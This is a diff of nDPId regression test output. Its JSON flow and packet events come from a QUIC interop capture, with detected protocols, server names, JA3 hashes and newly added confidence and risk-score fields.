 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1603816434659,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434659,"pkt":"pJGxgjQ5PKn0qB\/sht1gA8OgBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmtREBuwTYsN\/CCgoKCgj6DPHJWWs8sAAARL55hiYulShwyIvWIzeLs9lbgr6rmw2K6C37PVfcJZDvZCsi+yJ6TesBrbkUmHPBfXK2VSsq+4q1cI5h2aHxdCKt9ff4StlBulmgH+Bx3V5qJpzO+chyDdznTZrYqtjC6v8ZBmqg6a0NWZctg5sOGc0dmWqWQt\/s1k80Opf4xkQymFAPA9Pl4JS9+iEpGVBaepowwgfscg0eVp\/g4KhRhi2KxzLJD4JVToYgB90k\/XMf5w3IY1+ur6LCGNOvp5CgM1wSVcjlTXRfF2sQ8Nt5yAOXsMdlE2VREtX+yKxHSfWv2qqrbcbq6RVZYdc+ds1nkWyZ\/6jdHbCssoBrfhArvTqJ3nXGeMUG+bKJ8FrC+4G2Lxo3r7Ru71nKnVeUZu9UYw31AJEBbUWJ15R3KR8bSsgXVEA1WA99CJtgXyQXqZETvNqqmNWotKljKjV7OgVyrLmK286tZpqcji\/W3bv\/Ubygl\/yKnAKUAdc0UtIijMu1BloVA+m4PWftVJgbHf3aNTI+rX\/vVy3nXb0QxfA9y88X4009Gs60l0v0MkyueqKT84n5UNIPGZG6kKOK4w37tFYHam4lcYFhUTipTGlChqgi7Rf4rTS7tAG+8PbEvTqHal3HPtJlWvTM+HbREgYOOX+JhiQqeFaskCeQtAFZK2PQl21O\/xEnuuZnwPjd1JkjtwZsem8bzkoeN4610EXK0Ys8ust+NXwAs0bP\/var5LJYH9Np4yVLvPxPvG8XuijcEgZh9Ws\/PfZ9C625UJ6lCdqn5BKdsrwhiY3rVJi0Gb3BXOKIhsyD2r8TfRwv9Zq4BaDAYzj42tlUE3f\/S15wR2pPt+JBRpoPkMMI+gDAQhJn8p8DcnyFkIppSWC9eOywndfHU5\/yUdNXRQwe9qMMJPyoMAFljWxrTTkdBf9XHdyCG0LJ82SE2TMNyUEKoTvtO+s6V45sw4+vLlhHFWzUFy2TDAYLwJNFtU2MgtRT5uCj687n1bMGAYODqCavE72METWdUVuP7KQCk+xmcSAjbR9cQdf0Ld5yf6144baG7pSmrNRAZds9af9ka\/SYB65ZE7zkDGunpr82jyDWS2FNTrKtaVTKmR3FhTiIDLlKPp8T3xukB7\/896wGVPowkyKdVGwn1U7d4smdlgzTqpu88QlyVTsqovLhf+Cl3l01W8nhlUKi7h\/7LgxdSIr\/1gHh5vnSqEyBwm2o1SGij1+TJ05CbhlsZnpgh9DpccxP1I\/Cy1W\/csGNz5P7WukiqEENPTqn7PXD\/3lj2VFKnZ10TEaU4eoOK5Egn7iJWSlbXxC1+uwb2ktJYlIcBWdWgcsSv\/EVRcpOxuacQcBKDfkoJTamdzkoxAEalFWSJMb9d\/CRNa9R8Rgar09wnJqe04d9jL9dUW6cDWYyJSw+MWOP260ZOljLVpA2a1QumvmmIyr8a7jSho4tML+Kc5q0tio8WmChgQRA3uSkUpNwnyEx9DCg96kTZlDeJwu7RwrkaoKlX0GjuohysCaFrtrDI24bZNO8w24oU9Fm+r6MEXXwEQxB0LwQxQFPxdBr0HMioBlCcF10uOji69LTOSZkYvb9+AYrA2jB9gSAJO3UPpzSFaCEJqf9FZw\/TgbQTNNBsw=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434659,"flow_last_seen":1603816434659,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434659,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434659,"flow_last_seen":1603816434659,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434659,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434661,"flow_last_seen":1603816434661,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434661,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1603816434661,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434661,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAqp9AAEAR4XjAqAGAKHC\/PNIfEVIE7KqIyQoKCgoIcBuNCNTaAX0AAETSsdkQHvJcN7bcF1ORvnbsKUKjlPXY0qQr5k5uOcDOcZrEKpvgL9RbsKleW8ZMaZNBIcnwq2KO7Ra5INHkVKJRC0TkUHMwFXdKdeaESLl2Sccd706kHiSPpX2Lbm+12fv10onPbU6DngslVSwo5iC2jlneokoStHZ4sxg1C5Je9i6sU3G77ZkPXvlXk0NdQQdexNFkb5jV\/JGW0vFPxDe\/qF9kedjCbIxx+p372PhnBv7iEwZ5Yhty+\/qNKY4yyyzUUwAkAmsK2pn5dzcchowy2PxUUm7hjeS7h+ta9tYiPjGP4k1V5zZKY7Q1iEzKbQmeKLLMluT7Ze6EQ\/94FkLhmXXWckZ88YK2QIDTY12s2\/+YoUrmy0fuxliVJc4e7t5KZxll\/xsK3NXnecJzT\/C9JRu8GZI0MGntc6sD+SVMUDoRX5MmL6JI3Lgrth1lbQy1hnltXa2ICmJpXg4UGGlDL1Pjydtfs82r+A5HZhHO8I+yeL60lJGO\/pmXurcvVllxGtQGjKy0Qx8L\/+0\/h97ODK4A9BOM8c5uVRJZi+ae5YWCQBxdqswC\/na2\/hdsvvl7+jK\/hb5lcLu18N2HToRBmI2OttnAnni74F8psk6eNPlA1WXh4QFnhdp7k1TRWG82dah5Np6uhn0FWu8spp+GpOz1PstbpUlg7HUDKDRocRvdo+XzWoapXRLt2rZBMpFM5+qBvFVKX6Ap5vpKqXx1vyTZc7a1PZSOkBPGsuBfMn\/e6CFzZ\/7SKPFuN1FEHhp6qVSfqkNu+E65oEYHbyp1GfsjmuOEnOWm9QuYUWXPMO\/ZpslsQLq28PkTI45zSR3jBaqY+U4cAU8hHI7Y40pZi0OVHAUG3Cp6mgeeNysES80m0WoJn1e6vRigeA1nc\/I4X7I+sPdNk2rBF6nEfBWEHw7MllB3iWKvvfivqsRWGfnLPVIWWdgqIoeFXHZ0RtFAK+dhBCktFzDp\/q6hAfIktX3z+sj5E4pGLpkcvClK3JUCXIBwpBXNz\/Kc9u134cEFWcWfbtjt65orTzu8PxGQYP+2jYE6lnk\/tcEolSkAelGkBK\/fE95QONEIEfiGb2tudRlXWTXRf\/FFFuldF0FdSJr50n\/Ih08O2ebAjk8ljjBC4Vr56KppkjdyyoUri8YzcV36sbFJqSwNQqsETWwcWH3GRqKMaQ+n+GVJUfR2mVE\/e4E852F32tsINiUu9KMW+toNgqOQfW3axNf6JaPFYtyy7MrNLsqhd2DTcip3+w6pKInaMiPiiKc8Fs2riJwto+W7a3bpQaoELeNUhEukCZCq\/FzN9PqVxk6EFWsqUSSSGklINGSbIS8sc+UAhevcQz0048wkjFBmEZFqu5A\/ObrRfWUEjpP8hKYzq9fOtRsoabYuH0GT29NVVZ6mp6+ZCCS2cAvfDT18d5ydh7ws+klcqRStiKM5PnIuDiY9ahp4jcvj\/XCvOWH28khmORKIgTIM5tVtnApY5TcVPqz7Uqmg2PcjSYyRBrJch\/eSfjOrA\/cCMqhxLApIy5m9eIL4iY+YzrKwVPTBJ1t2v4mujsR71BWWVXgie2CQjixGfOz6PTiXloHY0ohyCpxw0Cg0ysy1PcwnMPh+3oGN+0IKbU7LLyLHzUsIyN44wigmXzAl6Q=="}
-00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434661,"flow_last_seen":1603816434661,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434661,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01002{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434661,"flow_last_seen":1603816434661,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434661,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434664,"flow_last_seen":1603816434664,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434664,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1603816434664,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434664,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA4mFAAEARxULAqAGAwb4KYuh7EVIE7MZSwQoKCgoIhDOd38iF14kAAETS+DrcKxcR6weCAMpXP0WCjIu9ZBcpWi0OIwLjGToed\/giv9qrtDo9ivnhToDBOwIFut7lx8oGofCTHgF7Bu0VwbCafc3NxbT0fVzbuULC9eYaVRWQHPCUD3HNkinLSEKLzkqEotl3g646wEpRi\/ugoezcuEqO2y6FIB5R6lgny7Nkkc+zMDGl\/vVsq9D4yR\/HW1d+8htwfQLJRpA9hzqrxRXBKybzFVVjhg+KSz67S75CNguDyG4FD4d5JXshyl\/M4INjh32wAMrYFGa8t+2d68fOM2TsdLASGnjmnLNA7\/Pf8UMA6n7BdmW2IJneYpplOs2JDLXzJklKXNuJdllZWQX88VAVkIZdlhRUIxXv\/f7UmxqAgBcsb65UxpALzeD9UOYFX7eXnFX3CBNctLx4OV4vy5qTojgYXWndnvZWDyo9r1nMBp8D6VlFL3WOfCfGoqwqeHusn5C43hBSHrku\/bXz9iJXIhkW2exazvoHN691IPr0B73C3NnmhicLFxNH7FU7WO\/4IL+6sD9DZXTIjSg6oTpPZcbUD6nL7y5Da7hPow3PhI\/sdvRXmbzab8jO1EGiZZHwGfa4q6m9yRM\/TXA5uhhLvU2EfXT91420relOj408ZVI6EUSGceNLMighOPfPAfp0WOhbMCbd98H61M55hJNktUMuazO1d0gcsWhNN7ihq3R6vEE9ycG3wWK4AZXs7o9pNpiOjFyi\/1mC6Ku8u1sBA1oNJJOJnGURm0YtMoufHAuKV2LJVu2OeQAP\/A2\/w5vSvzrQLOGEBdMHP3rIjZlGA4ez8O3T8wl88X4DTz9tphYgqFCKVqs8At9jd7jId653CvC+xEYdEiNG9bQtgVNzXeRz5DgAY\/Rramv\/s0Mz9eqNUZ5kDg4J0SUVs70edYwUxeTQM\/DGMsrfTyMpxJinyaJ+lIbkswjz4fLDe6hTAtCperVOSIVU7PFEEJNopz\/TdPDhB\/\/OU+mjuGnm9dVJqiOBsKq6hwakuMJMeEbqZ4oR6\/2tTEOQMV7c3m8hAgBlfCT+et0oHj0In1XsO41lgeBhcmsxfgpL0+MgrRWpX3hNlmOw2YFL7IPahaVoqqwt+hlD2GAaUYWeZHKQIID8JZod24qH7\/lYJ76jofC+JdWXEJ7R4KLVHjma\/RdasqECMSrg4m7keaHTZDKrBR35ahliIHV+sND3+6E5IN\/2QdoUlOi4\/UYlyycPYl2QrEjCc4E8TPnrA7HhR8cbOqvr2NJUiO3vmvNIk9u905r1d+yKr0KSvjEMW4aoGs1cnkqp7BFwfwUFTFXE57dIo29rq+a60tDyag9gqUpuo7QsXjOi2fVAkTyRGrjCd9eSs5MDoGygOvvn\/yw4ZAA3XpTxroAMLQ9Sj\/92T0qxoDCFA5OG7E8A7GbyiO5B2nEiMAOZpw+5PZXL4BrU03Z37oc83D+zHRg9XCBGkB3eyfyP2\/ya8kSOgnWI5DRzDtrL+axTWaV4naIX3w78wYegwyfuMaorTISN4Ye+UzmrsF4ld5d7Pp68ZmvyPCebtO\/KSElf\/sucwWTuBzbcyui8aFCG0Vq9OlG0\/qaPlP1qL9A8E8F37BOHLRzvh\/sbn8ks0BPPWFNRGNxMVhkFaWjx9NYOtOhnexATQq7v4e\/jeA=="}
-00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434664,"flow_last_seen":1603816434664,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434664,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434664,"flow_last_seen":1603816434664,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434664,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00641{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1603816434670,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434670,"pkt":"pJGxgjQ5PKn0qB\/sht1gANDQBNgRQCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdwnwRUgTYPWHACgoKCggiwZ0u09kvJQAARL77XjijFoQtvpL+zAbPeN0VMZAH77o2Zf3Z\/VxyA9MhcBb1aoo2HyDxw4AGg1rpwYEvZC1KOFbHEvRCy\/7Qr78EUwCK7jfp3PwwAQqSqWeygMwdmPiD9xsvVeM\/Lg3sKV5Yt9sS6nVuVMVaAANebK6ODqzmbz6o3JQ8SCforD0NMCEzwS4zB3SuPu96Zlh707dBA4O8O9hnahrfzpYrma3GTkWvQNZm+MZwybX+ZiPVsaHNWO4eC2QTnSZ5AQr9jvuvVHtv4xtMgtNapGHmqllBavgaXk+UI6hfTQM2FE1B5tGaz6wpXpW9q4R\/XybVurW6TyGaQAE6Rv1VcNFUQkd3osuzBpTRgRd9uQPLk9nYNE1PNSuiR91fTDaJoLkRppS+gpYwkOZenhVm6gOiHF4bfs5ERt4YlwEn2Dp0u5C5nrVVxtfjnYJ5IwT7hUHyh6h9suifUimgbbxzIaysmGlD4k2fx9pmDLHsUHTce4UJVqFY73JtMr6k+yW4T+WXDKoYMXAeEnYYUrI05RCVc4XXpAwD9xw2VGUTFNaUBIeHo7WcMaqEEgdPOnluAhzJsgCW+N8o0F4I+kCQseYCSboaFjLBLNq0zPRus1FaJ\/zpb0BAxHAiXlVn\/igRt26xRMAbTnTk5GPW7C6QEex76kpaaQ7HDdZHqKpOAkSMflF7jIP40HYHAQatrIYPmDQgSWfN880GBmzH9sYEwnjgxWDiL0+toa5E6wd7EQeR8y5+\/Dc5Uzh6tsLpKuR7N9HU++dqYI\/gOtoO809QFWpju+r6P3XwUeBL1ZT0bLR4yPGw3dekRK+qnie3Kqo5b7bYJauiDOWg\/Y4N7gkZK+lB7oklk5ykDxrBCjJgZkBXy3ps5MBGX6YeIhFLnieceXGOD5JF1MA85KdmciDwctd24umJ8IcaHVflsn7+7ZNAlehJDPmcAPO2TlEPY4\/yHOBUFJG7kAZebLJ+uJFdZdWkSaRi1YFo0sxbTkoNNpO6Hu+zAAN0IAy5sYg\/mLzAclK2KdqEZerl\/B5NatrR\/cF5OTxG9p02zemz7BknqKEgbaBN+IFnswhrUXlOTz5kf7R\/m8wKuhLc\/igh6Ij3ng6sR8vbemM2AfCHREP8MbsPro6xc5aF3dAmmWkn13MUXrpl0LTzZdwzZdq7FodGh9dDjxRcZYM1N8++Se9XsHKEp6uPV\/JaA3s2p5q4ZevQE2LX20v4OvqdVF0MMSV+4OZz6eMTL82DKbZc3CST1ORXADs6BAjz6it9rKE2XOBrS5gDnpCiRLCFudHLSBlymJbI0g2CwumFP5vBO4Zn9qFD7JxrpYjBkMOpt21xD\/BtOBNga1EAbpK91wtD+ubtYSnpbhN0OrJGtHIFjpiwh6Xlp1yrbCWvXV5CMDi7VuMCY6X2f\/duWafjiHD8aUvnVKBJpAoeqDFPimiegbb28SnwJ5uYauvYPhvY3ErcbIeR0f\/m1a1DdBjB1WQmp0Fu4clnTkNaqlT5MCeG\/48z1ijZB7ZQmAcaHRGOM2gO6JTlbbBnQAYR\/DVuXyM\/B5q+uHxWP5bTLYV9915QZrJqVKV0Gf0oQ8wUAFGHwVAmWeVHB64hlXfKeooZTyi+7AZWKi3\/lA=="}
-00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00641{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1603816434670,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434670,"pkt":"pJGxgjQ5PKn0qB\/sht1gBxOBBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPtKIBuwTYLLrDCgoKCgiO5tu+VRPaUgAARL67x5+yoY3pY0MJItv\/fgrN1Aqjc+LGtbVLhqvz564YTYsK8b+1F2va9jRV8nEV+5OOHqmqaHlOCYYabeXxngu7jBV+i2zDD5mXOeNwP0vYEvtnoouvzEl7eLb5EE0+MuDiJt84m7jpfeD9j3nru+ZcUw2gN2lqFsUahOHFHxiiMRzquZrGDqevIu7WfSfXXUaDgMbSDA6CvWRjCP72DFgLsQ\/11QQP633nQ0SLKipyJqDr4JvqJmirsRRFK4Y2O1d4rwaWvjBQJbZEvrKGBhUisRe4vJCgt83q62hhhVwI+BmOHGZwcH1NeIw9OfXzIkzF9MfEbO7hX8+HXuUKtpvyJorRIV9+dNth0bRPExaC9oZ6eQgb4KnoyGQunWwMuV7XDIWVGPpUovXJ6L3rc7vDqV0O33okP\/XwzTuMfNCRModoaAMilI37jOSGD70L7Ukxtnkod00xzN\/rRqaOySSScNetQaqN\/b8SumEm0AclR2UEqVCZ\/oFDQW3dlFzOPiolM3TYJHmvPtQ07FoMBnxweA07DzM\/nlIehmUnkDIdfazZlo2WaXyT4kUCXiWSLkyBIKG6OPjGqxQRCjx7pyzScO\/zoIapRT5uA7FxkYfHjnUDRA4N+uhKsfgAHpDGOcVNfY46rti9HRBS+MLjtON8leaOxJHim+wQ0EeQlwbDu7H0Zej1LnLoFqMDWvyz+oUpsvxNgc\/S6MeDK9+JJrebwrhDc+tkmOK548PY4XvYXrqaTGIAivVpHbXZ3zU4Se3IsLa2rpf9EZv0u9D4VcFJRqv2B5CpAl42JhgNb9SlY4QjX\/zYb6IVVivP8oR+boam1SbalhEukEzoSf5vlgVVBVsupKLEgg8QJ4aPvxMTspsMlgkwzLYOK4L5ecOdzbax+0i5aGOmAs30VE0cR4zt2Dxp0GDF2dDg\/9qdw\/BFFFjufPPrjL58CEC5anG+0PnjLNiz99f9A5oIivUVqwWvAEBh3kOUatfc99UXPxAS5VMTgfEOgcxECNa+3dG45igyiOYw0SklHmGfzdommYyu2F0JXKQZKPR4P7uTdH4l9rTKALyu5hrveJCLxlBPzHhp5XxWlFHpXE7yqKl6JoqWNO9m4KnOkD1SiE0BK4iBcHTagyf\/j7KuNtCJQUEjQ59\/x7ZF1iPKFPPyQ+DFZfS4ZMMJAdRuce7PfZ2jZfkuletLSo94qexc6EAps2f0\/fcQwBTkA1Pa7cpknrlPE6nDQwDmYjfxjl2FPTHYb04B\/4LG+OuYH1R8tH+E5cKey0fYaMhnlyRtm7l4zhxXh88eVjpaZDsIoW7JAZhBUfEztlZ0AOc8r\/vP+qFhB8f0D7eEfpR8bO8\/EgtwQtTbuBaw0z2uWUEDIaafMNhsQ1f4mmfFO2liKZH6G6GRfv99KKrH35jUxqsjJeBwQM\/EJ113jCKlIApAONDGVtmrUbUM7eAMD4vuRho9kE\/w49GkWM1RjqkESV8QnS5lO0lusZRdgG0jcilTPBNKWvJtuU+BOtxOeZOoU0KAQk0iRVOjpxTJNLkEFDMqLOTl4GP6l1DPyRiUIbC9dxVJliklcqIHHcx9Son3\/0eV4Dlc9XMJzUFYLYDpip1il7dd3MOMzw=="}
